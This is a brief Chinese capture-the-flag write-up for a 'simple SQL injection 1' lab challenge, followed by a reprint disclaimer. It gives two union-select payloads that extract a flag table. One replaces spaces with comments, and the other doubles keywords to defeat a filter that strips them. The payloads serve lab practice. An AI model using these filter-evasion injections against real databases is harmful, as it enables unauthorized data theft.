題目鏈接:http://ctf5.shiyanbar.com/423/web/
簡單的SQL注入之1,比2,3都簡單一些。利用2 的查詢語句也可以實現:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
經測試,簡單的SQL注入1 過濾了關鍵字,重復寫即可繞過,如:1' unionunion selectselect flag fromfrom web1.flag wherewhere '1'='1
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。